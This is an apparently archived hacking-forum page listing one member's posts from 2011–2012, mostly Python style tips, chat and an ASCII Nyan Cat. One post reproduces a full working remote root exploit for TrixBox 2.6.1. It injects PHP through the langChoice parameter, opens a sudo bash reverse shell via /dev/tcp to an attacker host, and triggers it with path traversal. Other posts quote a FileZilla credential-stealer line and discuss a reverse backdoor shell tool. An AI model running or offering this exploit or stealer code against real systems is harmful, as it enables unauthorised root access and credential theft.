1
Anonymity and Privacy / Re: How do you stay anonymous?
« on: March 28, 2012, 10:16:32 AM »
Ugh, how does SSL make one anonymous?
This forum is in archive mode. You will not be able to post new content.
Show Posts
This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.
2
Hacking and Security / Re: BT5, Blackbuntu, Pirate linux
« on: March 08, 2012, 08:35:02 PM »
None of them. I don't like these all in one distros. Thats why I'm currently running Arch Linux.
4
.NET Framework / Re: [SourceCode]FileZilla Accounts Stealer
« on: February 19, 2012, 09:42:58 AM »Code: [Select]
string sFilePath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData).ToString() + "\\FileZilla\\recentservers.xml";DAFUQ?
Can't believe they are actually storing the passwords in plain text.
5
Projects and Discussion / Re: EvilReverseBackdoorShell
« on: February 19, 2012, 09:34:10 AM »And i am asking you people, got any idea's on features that will just be mind blowing?, feel free to apply if you like to write python/php modules.
Encrypted client-server communication.
6
Scripting Languages / Re: [Perl] Port Scanner
« on: February 19, 2012, 09:26:44 AM »How is Perl? The syntax looks so much nicer than Python, I am trapped in C++ style syntax.
/facepalm
I was going to argue here, but I will just say that Perl got a reputation of a write-only language, guess why.
7
Hacking and Security / Re: GPU Accelerated Hash Cracker (ighashgpu)
« on: August 14, 2011, 10:21:17 PM »8
Scripting Languages / Re: Python error - TypeError: cannot concatenate 'str' and 'NoneType' objects
« on: July 14, 2011, 08:18:38 PM »
The indentation on that line looks fucked up. Try this one:
I have also commented out line 64 which seems useless to me.
Code: [Select]
#!/usr/bin/python
import sys
from socket import *
import re
import os
from time import sleep
print ("[*] BY THE POWER OF GRAYSKULL - I HAVE THE ROOTZ0R!\r\n"
"[*] TrixBox 2.6.1 langChoice remote root exploit \r\n"
"[*] http://www.offensive-security.com/0day/trixbox.py.txt\r\n")
if (len(sys.argv)!=5):
print "[*] Usage: %s <rhost> <rport> <lhost> <lport>" % sys.argv[0]
exit(0)
host=sys.argv[1]
port=int(sys.argv[2])
lhost=sys.argv[3]
lport=int(sys.argv[4])
def create_post(injection):
buffer=("POST /user/index.php HTTP/1.1 \r\n"
"Host: 192.168.219.132 \r\n"
"Content-Type: application/x-www-form-urlencoded \r\n"
"Content-Length: "+str(len(injection))+"\r\n\r\n" +injection)
return buffer
def send_post(host,port,input):
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
s.send(input)
output=s.recv(1024)
s.close()
return output
def find_sessionid(http_output):
headers=re.split("\n",http_output)
for header in headers:
if re.search("Set-Cookie",header):
cook=header.split(" ")
sessionid=cook[1][10:42]
print "[*] Session ID is %s" % sessionid
return sessionid
print "[*] Injecting reverse shell into session file"
bash_inject="langChoice=<?php shell_exec(\"sudo /bin/bash 0</dev/tcp/"+lhost+"/"+str(lport)+" 1>%260 2>%260\");?>"
reverse=create_post(bash_inject)
raw_session=send_post(host,port,reverse)
print "[*] Extracting Session ID"
id=find_sessionid(raw_session)
print "[*] Triggering Reverse Shell to %s %d in 3 seconds" % (lhost,lport)
sleep(3)
print "[*] Skadush! \r\n[*] Ctrl+C to exit reverse shell."
tmpsession=create_post('langChoice=../../../../../../../../../../tmp/sess_'+id+'%00')
send_post(host,port,tmpsession)
print "[*] Cleaning up"
cleanup=create_post('langChoice=english')
send_post(host,port,cleanup)
#send_post(host,port,cleanup) # sending same shit twice? doesnt look right. GTFO!
print "[*] Done!"
I have also commented out line 64 which seems useless to me.
10
Creative Arts / NYAN CAT ASCII
« on: July 02, 2011, 05:20:06 PM »Code: [Select]
+ o + o
+ o + +
o +
o + + +
+ o o + o
-_-_-_-_-_-_-_,------, o
_-_-_-_-_-_-_-| /\_/\
-_-_-_-_-_-_-~|__( ^ .^) + +
_-_-_-_-_-_-_-"" ""
+ o o + o
+ +
o o o o +
o +
+ + o o + Do you approve?
11
Found it on the Webs / Re: [music]FILTH FM
« on: June 27, 2011, 06:58:54 PM »
Thanks, been looking for some good Drum & Bass radio.
12
Projects and Discussion / Re: [question] Convert something To Pdf
« on: June 25, 2011, 04:24:33 PM »13
Scripting Languages / Re: [Python] CountMyFiles
« on: June 13, 2011, 05:36:03 PM »
You should try to keep your code width less than 80 characters. It looks better and it's a good practice. Most code editors can show a line on the right which will guide you. If you are using gedit, go to Edit->Preferences and check Display right margin, then for Right margin at column select 80.
14
Scripting Languages / Re: [Python] Random name generator
« on: June 13, 2011, 05:16:05 PM »
The following lines are pretty messy:
First, you have declared the GeneratedName variable, but you are not using it anywere in the code. Second, your while loop doesn't look right, something iike this would be better:
Third, you are not checking for duplicate names. Also, using the choice() method from the random module would be much better instead of generating pseudo-random integers.
Therefore, the above code could just become:
There are more optimization which could be done like appending the names to the output file straight from the while loop and like I said in one of the other topics, the GetFromArg function is pretty useless. Again, you should definitely read about the naming conventions in Python and it's syntax (PEP8).
Code: [Select]
TempInt = 0
GeneratedNameArray = [] # initiate another array
GeneratedName = ''
while TempInt != number:
RandNumb1 = random.randint(1,len(ListOfNames)-1)
RandNumb2 = random.randint(1,len(ListOfNames)-1)
GeneratedNameArray.append(ListOfNames[RandNumb1]+' '+ListOfNames[RandNumb2])
TempInt = TempInt + 1First, you have declared the GeneratedName variable, but you are not using it anywere in the code. Second, your while loop doesn't look right, something iike this would be better:
Code: [Select]
while len(GeneratedNameArray) <= number:
#do_something()Third, you are not checking for duplicate names. Also, using the choice() method from the random module would be much better instead of generating pseudo-random integers.
Therefore, the above code could just become:
Code: [Select]
GeneratedNameArray = []
while len(GeneratedNameArray) <= number:
name = '{0} {1}'.format(random.choice(ListOfNames), random.choice(ListOfNames))
if not name in GeneratedNameArray:
GeneratedNameArray.append(name)
There are more optimization which could be done like appending the names to the output file straight from the while loop and like I said in one of the other topics, the GetFromArg function is pretty useless. Again, you should definitely read about the naming conventions in Python and it's syntax (PEP8).
15
Scripting Languages / Re: Twitter Console Version 0.1 [Python]
« on: June 13, 2011, 04:37:55 PM »Just wondering does the twitter api come included with python or do you need to download itOf course its a third-party module. If you are running Ubuntu just install the python-twitter package:
Code: [Select]
sudo apt-get install python-twitterotherwise take a look here: http://code.google.com/p/python-twitter/.